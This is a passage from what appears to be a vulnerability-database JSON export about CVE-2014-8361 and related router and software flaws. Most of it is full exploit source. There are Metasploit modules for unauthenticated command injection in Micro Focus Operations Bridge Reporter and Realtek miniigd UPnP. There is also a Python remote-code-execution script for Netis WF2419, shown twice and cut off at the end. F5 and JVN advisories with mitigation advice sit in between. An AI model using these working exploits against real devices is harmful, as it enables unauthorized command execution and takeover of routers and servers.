["CVE-2014-8361"], "modified": "2015-04-24T00:00:00", "id": "ZDI-15-155", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-155/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-30T15:30:58", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162408", "href": "https://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits a command injection vulnerability on *login* (yes, you read that right) \nthat affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. \nIt's a straight up command injection, with little escaping required and it works before \nauthentication. \nThis module has been tested on the Linux 10.40 version. Older versions might be affected, \ncheck the advisory for details. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2021-22502'], \n['ZDI', '21-153'], \n['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'], \n['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947'] \n], \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, # This should be a safe value, it might take much more \n'DisableNops' => true, \n# avoid null char and the injection char (`) \n'BadChars' => \"\\x00\\x60\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n# all of these (and more) should exist in a standard RHEL / SuSE \n# ... which are the only two distros supported by Micro Focus OBR \n# (telnet doesn't seem to work though) \n# \n# all reverse shells were tested and work flawlessly \n'RequiredCmd' => 'netcat openssl generic python' \n} \n}, \n'Targets' => \n[ \n[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-02-09' \n) \n) \n \nregister_options( \n[ \n# normal (no SSL) port is 21411 \nOpt::RPORT(21412), \nOptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), \nOptString.new('TARGETURI', [true, 'Application path', '/']) \n] \n) \nend \n \ndef check \nres = send_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => rand_text_alpha(10..64) \n}, 10) \n \nif res && res.code == 400 && res.body.include?('Unrecognized token') \n# should return a stack trace like \n# Unrecognized token '#{data}': was expecting ('true', 'false' or 'null') \n# at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...) \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef exploit \n# if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash \n# we have to do this manually, the encoder is not smart enough to do it, and it will \n# fail if we put 0x22 as a bad char above \npayload_enc = payload.encoded.gsub('\"', '\\\\\"') \n \n# we use 0x60 (`) for injection, but there are lots of other possibilities \ndata = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\" \n \nsend_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => data \n}, 0) \n \n# it's tricky to check the return value of the request here \n# - it might hang (no return) and give us a shell \n# - it might return 400 or 500 and give us a shell \n# - it might return 400 or 500 and give us nothing \n# so ignore it altogether and hope for the best \nprint_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162408/microfocus_obr_cmd_injection.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-05T22:11:29", "description": "", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "packetstorm", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2015-05-29T00:00:00", "id": "PACKETSTORM:132090", "href": "https://packetstormsecurity.com/files/132090/Realtek-SDK-Miniigd-UPnP-SOAP-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude REXML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', \n'Description' => %q{ \nDifferent devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command \ninjection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, \nthere is no output for the executed command. This module has been tested successfully on a \nTrendnet TEW-731BR router with emulation. \n}, \n'Author' => \n[ \n'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery \n'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2014-8361'], \n['ZDI', '15-155'], \n['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], \n['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] \n], \n'DisclosureDate' => 'Apr 24 2015', \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ 'MIPS Little Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSLE \n} \n], \n[ 'MIPS Big Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSBE \n} \n] \n], \n'DefaultTarget' => 0 \n)) \n \nderegister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') \n \nregister_options( \n[ \nOpt::RPORT(52869) # port of UPnP SOAP webinterface \n], self.class) \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/picsdesc.xml' \n}) \nif res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/ \nreturn Exploit::CheckCode::Detected \nend \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown \nend \n \nExploit::CheckCode::Unknown \nend \n \ndef exploit \nprint_status(\"#{peer} - Trying to access the device ...\") \n \nunless check == Exploit::CheckCode::Detected \nfail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\") \nend \n \nprint_status(\"#{peer} - Exploiting...\") \n \nexecute_cmdstager( \n:flavor => :echo, \n:linemax => 50, \n:nodelete => true \n) \nend \n \ndef execute_command(cmd, opts) \nuri = '/wanipcn.xml' \nsoap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' \ndata_cmd = '<?xml version=\"1.0\"?>' + build_soap_req \n \nbegin \nres = send_request_cgi({ \n'uri' => uri, \n'vars_get' => { \n'service' => 'WANIPConn1' \n}, \n'ctype' => 'text/xml', \n'method' => 'POST', \n'headers' => { \n'SOAPAction' => soap_action \n}, \n'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\") \n}) \nreturn res \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\") \nend \nend \n \ndef build_soap_req \nnew_external_port = rand(32767) + 32768 \nnew_internal_port = rand(32767) + 32768 \n \nxml = Document.new \n \nxml.add_element( \n'SOAP-ENV:Envelope', \n{ \n'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', \n'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' \n}) \n \nxml.root.add_element('SOAP-ENV:Body') \n \nbody = xml.root.elements[1] \n \nbody.add_element( \n'm:AddPortMapping', \n{ \n'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' \n}) \n \nport_mapping = body.elements[1] \nport_mapping.add_element('NewLeaseDuration') \nport_mapping.add_element('NewInternalClient') \nport_mapping.add_element('NewEnabled') \nport_mapping.add_element('NewExternalPort') \nport_mapping.add_element('NewRemoteHost') \nport_mapping.add_element('NewProtocol') \nport_mapping.add_element('NewInternalPort') \n \nport_mapping.elements['NewLeaseDuration'].text = '' \nport_mapping.elements['NewInternalClient'].text = 'CMD_HERE' \nport_mapping.elements['NewEnabled'].text = '1' \nport_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\" \nport_mapping.elements['NewRemoteHost'].text = '' \nport_mapping.elements['NewProtocol'].text = 'TCP' \nport_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\" \n \nxml.to_s \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132090/realtek_miniigd_upnp_exec_noauth.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-02T22:58:24", "description": "", "cvss3": {}, "published": "2020-03-02T00:00:00", "type": "packetstorm", "title": "Netis WF2419 2.2.36123 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "PACKETSTORM:156588", "href": "https://packetstormsecurity.com/files/156588/Netis-WF2419-2.2.36123-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa \n# Vendor Homepage: http://www.netis-systems.com \n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 \n# Date: 2020-02-11 \n# Version: WF2419 V2.2.36123 => V2.2.36123 \n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123 \n# CVE : CVE-2019-19356 \n \n \n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\" \n \n#!/usr/bin/env python \nimport argparse \nimport requests \nimport json \n \ndef exploit(host,cmd): \n# Send Payload \nheaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n'Content-Type': 'application/x-www-form-urlencoded'} \npost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\" \nvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\" \nreq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value) \nprint('[+] Payload sent') \ntry : \njson_data = json.loads(req_payload.text) \nif json_data[0] == \"SUCCESS\": \nprint('[+] Exploit Sucess') \n# Get Command Result \nprint('[+] Getting Command Output\\n') \nresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\" \npost_data = \"mode_name=netcore_get&no=no\" \nreq_result = requests.post(result_page, data=post_data, headers=headers_value) \njson_data = json.loads(req_result.text) \nresults = json_data[\"tools_results\"] \nprint results.replace(';', '\\n') \nelse: \nprint('[-] Exploit Failed') \nexcept: \nprint(\"[!] You might need to login.\") \n \n# To be implemented \ndef login(user, password): \nprint('To be implemented') \n \ndef main(): \nhost = args.host \ncmd = args.cmd \nuser = args.user \npassword = args.password \n#login(user,password) \nexploit(host,cmd) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\") \nap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\") \nap.add_argument(\"cmd\", help=\"Command to run.\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\", \ndefault=\"admin\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\", \ndefault=\"admin\") \nargs = ap.parse_args() \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156588/netiswf2419-exec.txt", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-06-27T18:51:27", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {}, "published": "2018-01-18T18:13:00", "type": "f5", "title": "miniigd SOAP service in Realtek SDK vulnerability CVE-2014-8361", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2018-01-18T18:13:00", "id": "F5:K57390658", "href": "https://support.f5.com/csp/article/K57390658", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2021-12-28T23:20:31", "description": "WSR-300HP provided by BUFFALO INC. is a wireless LAN router. WSR-300HP contains an arbitrary code execution vulnerability.\n\n ## Impact\n\nBy executing a specially crafted request prepared by a remote attacker, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Firmware** \nApply the firmware update according to the information provided by the developer.\n\n ## Products Affected\n\n * WSR-300HP firmware 2.30 and earlier\n", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "jvn", "title": "JVN#74871939: WSR-300HP vulnerable to arbitrary code execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2017-08-08T00:00:00", "id": "JVN:74871939", "href": "http://jvn.jp/en/jp/JVN74871939/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T23:20:11", "description": "Multiple Aterm products provided by NEC Corporation contain multiple vulnerabilities listed below. \n\n**Cross-site Scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20680 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N| **Base Score: 6.1** \nCVSS v2| AV:N/AC:M/Au:N/C:N/I:P/A:N| **Base Score: 4.3** \n \n**OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| **Base Score: 8.8** \nCVSS v2| AV:A/AC:L/Au:N/C:P/I:P/A:P| **Base Score: 5.8**\n\n ## Impact\n\n * An arbitrary script may be executed on the user's web browser - CVE-2021-20680\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Update the firmware** \n**For the users of WG1900HP2, WG1900HP, WG1800HP4, WG1200HS3, WG1200HS2, WG1200HP3, WG1200HP2, W1200EX, and W1200EX-MS:** \nUpdate the firmware to the latest version according to the information provided by the developer. \nAccording to the developer, the fixed firmware for WG1800HP3 will be released later. Until then, apply the following workarounds. \n \n**Apply workarounds** \n**For the users of WG1200HS, WG1200HP, WF800HP, WF300HP2, WR8165N, W500P, and W300P:** \nAccording to the developer, the update firmware for these pruducts is not planned to be released. \nApplying the following workarounds may mitigate the impacts of the vulnerabilities. \n\n * Change the passwords of the web-based management utility and the Wi-Fi encryption key to stronger ones\n * CVE-2021-20680 \n * When accessing a website, use a URL obtained from a trusted source and bookmark it. For subsequent accesses, use the bookmarked URL.\n * Close the web browser after the operation is finished on the web-based management utility.\n * Delete the credential of the web-based management utility stored in the web browser.\n * CVE-2014-8361 \n * Disable UPnP.\n\n ## Products Affected\n\n * Aterm WG1900HP2 firmware Ver.1.3.1 and earlier\n * Aterm WG1900HP firmware Ver.2.5.1 and earlier\n * Aterm WG1800HP4 firmware Ver.1.3.1 and earlier\n * Aterm WG1800HP3 firmware Ver.1.5.1 and earlier\n * Aterm WG1200HS3 firmware Ver.1.1.2 and earlier - Only affected by CVE-2021-20680 issue\n * Aterm WG1200HS2 firmware Ver.2.5.0 and earlier\n * Aterm WG1200HP3 firmware Ver.1.3.1 and earlier\n * Aterm WG1200HP2 firmware Ver.2.5.0 and earlier\n * Aterm W1200EX firmware Ver.1.3.1 and earlier\n * Aterm W1200EX-MS firmware Ver.1.3.1 and earlier\n * Aterm WG1200HS firmware all versions\n * Aterm WG1200HP firmware all versions\n * Aterm WF800HP firmware all versions\n * Aterm WF300HP2 firmware all versions\n * Aterm WR8165N firmware all versions\n * Aterm W500P firmware all versions\n * Aterm W300P firmware all versions\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-04-09T00:00:00", "type": "jvn", "title": "JVN#67456944: Multiple vulnerabilities in multiple Aterm products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2021-20680"], "modified": "2021-04-09T00:00:00", "id": "JVN:67456944", "href": "http://jvn.jp/en/jp/JVN67456944/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T23:20:13", "description": "Multiple products provided by ELECOM CO.,LTD. contain multiple vulnerabilities listed below. \n\n**Improper Access Control ([CWE-284](<https://cwe.mitre.org/data/definitions/284.html>))** \\- CVE-2021-20643 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N| **Base Score: 5.3** \nCVSS v2| AV:N/AC:L/Au:N/C:N/I:P/A:N| **Base Score: 5.0** \n \n**Script injection in web setup page ([CWE-74](<https://cwe.mitre.org/data/definitions/74.html>))** \\- CVE-2021-20644 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N| **Base Score: 5.2** \nCVSS v2| AV:A/AC:L/Au:N/C:N/I:P/A:N| **Base Score: 3.3** \n \n**Stored cross-site scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20645 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N| **Base Score: 5.4** \nCVSS v2| AV:N/AC:M/Au:S/C:N/I:P/A:N| **Base Score: 3.5** \n \n**Cross-site request forgery ([CWE-352](<https://cwe.mitre.org/data/definitions/352.html>))** \\- CVE-2021-20646, CVE-2021-20647, CVE-2021-20650 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N| **Base Score: 4.3** \nCVSS v2| AV:N/AC:H/Au:N/C:N/I:P/A:N| **Base Score: 2.6** \n \n**OS command injection ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2021-20648 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H| **Base Score: 6.8** \nCVSS v2| AV:A/AC:L/Au:S/C:P/I:P/A:P| **Base Score: 5.2** \n \n**Improper server certificate verification ([CWE-295](<https://cwe.mitre.org/data/definitions/295.html>))** \\- CVE-2021-20649 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N| **Base Score: 4.8** \nCVSS v2| AV:N/AC:H/Au:N/C:P/I:P/A:N| **Base Score: 4.0** \n \n**OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 \n\nVersion| Vector| Score \n---|---|--- \nCVSS v3| CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H| **Base Score: 8.8** \nCVSS v2| AV:A/AC:L/Au:N/C:P/I:P/A:P| **Base Score: 5.0**\n\n ## Impact\n\n * By processing a specially crafted request, administrative password of the product may be changed - CVE-2021-20643\n * By displaying a specially crafted SSID on the web setup page, arbitrary script may be executed on the user's web browser - CVE-2021-20644\n * An arbitrary script may be executed on a logged in user's web browser - CVE-2021-20645\n * If a user views a malicious page while logged in to the web setup page of the product, arbitrary request may be executed and as a result, the product's settings may be altered and/or telnet daemon may be started - CVE-2021-20646, CVE-2021-20647, CVE-2021-20650\n * An attacker who can access the product may execute arbitrary OS commands - CVE-2021-20648\n * A man-in-the-middle attack may allow an attacker to alter the communication response and as a result, arbitrary OS commands may be executed on the product - CVE-2021-20649\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Stop using the products** \nThe developer states these vulnerable products are no longer supported, therefore stop using the products. \n \nAlso according to the developer, the following workarounds may mitigate some of the effects of these issues. \n**Apply a Workaround** \n**CVE-2021-20645, CVE-2021-20646, CVE-2021-20647, CVE-2021-20648, CVE-2021-20650**\n\n * Change web setup page's log in password.\n * Do not access other websites while logged in to the web setup page.\n * Close the web browser after the operation is finished on the web setup page.\n * Delete password of web setup page stored in web browser.\n**CVE-2021-20649**\n\n * Do not execute the firmware's \"Check for update files\" function.\n * For detailed setting change process, refer to [User's Manual](<https://www.elecom.co.jp/support/manual/network/wireless-lan/router/wrc-300febk-s/wrc-300febk-s_users_manual_v2.pdf>) for the products.\n**CVE-2014-8361**\n\n * Disable UPnP.\n\n ## Products Affected\n\n**CVE-2021-20643**\n\n * LD-PS/U1\n**CVE-2021-20644**\n\n * WRC-1467GHBK-A\n**CVE-2021-20645, CVE-2021-20646**\n\n * WRC-300FEBK-A\n**CVE-2021-20647, CVE-2021-20648, CVE-2021-20649**\n\n * WRC-300FEBK-S\n**CVE-2021-20650**\n\n * NCC-EWF100RMWH2\n**CVE-2014-8361**\n\n * WRC-300FEBK\n * WRC-F300NF\n * WRC-300FEBK-S\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-01-26T00:00:00", "type": "jvn", "title": "JVN#47580234: Multiple vulnerabilities in multiple ELECOM products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2021-20643", "CVE-2021-20644", "CVE-2021-20645", "CVE-2021-20646", "CVE-2021-20647", "CVE-2021-20648", "CVE-2021-20649", "CVE-2021-20650"], "modified": "2021-01-26T00:00:00", "id": "JVN:47580234", "href": "http://jvn.jp/en/jp/JVN47580234/index.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:26", "description": "\nNetis WF2419 2.2.36123 - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-02T00:00:00", "title": "Netis WF2419 2.2.36123 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177", "href": "", "sourceData": "# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa\n# Vendor Homepage: http://www.netis-systems.com\n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75\n# Date: 2020-02-11\n# Version: WF2419 V2.2.36123 => V2.2.36123\n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123\n# CVE : CVE-2019-19356\n\n\n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\"\n\n#!/usr/bin/env python\nimport argparse\nimport requests\nimport json\n\ndef exploit(host,cmd):\n\t# Send Payload\n\theaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n\t\t\t'Content-Type': 'application/x-www-form-urlencoded'}\n\tpost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\"\n\tvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\"\n\treq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)\n\tprint('[+] Payload sent')\n\ttry :\n\t\tjson_data = json.loads(req_payload.text)\n\t\tif json_data[0] == \"SUCCESS\":\n\t\t\tprint('[+] Exploit Sucess')\n\t\t\t# Get Command Result\n\t\t\tprint('[+] Getting Command Output\\n')\n\t\t\tresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\"\n\t\t\tpost_data = \"mode_name=netcore_get&no=no\" \n\t\t\treq_result = requests.post(result_page, data=post_data, headers=headers_value)\n\t\t\tjson_data = json.loads(req_result.text)\n\t\t\tresults = json_data[\"tools_results\"]\n\t\t\tprint results.replace(';', '\\n')\n\t\telse:\n\t\t\tprint('[-] Exploit Failed')\n\texcept:\n \t\tprint(\"[!] You might need to login.\") \n\n# To be implemented\ndef login(user, password):\n\tprint('To be implemented')\n\ndef main():\n host = args.host\n cmd = args.cmd\n user = args.user\n password = args.password\n #login(user,password)\n exploit(host,cmd)\n\nif __name__ == 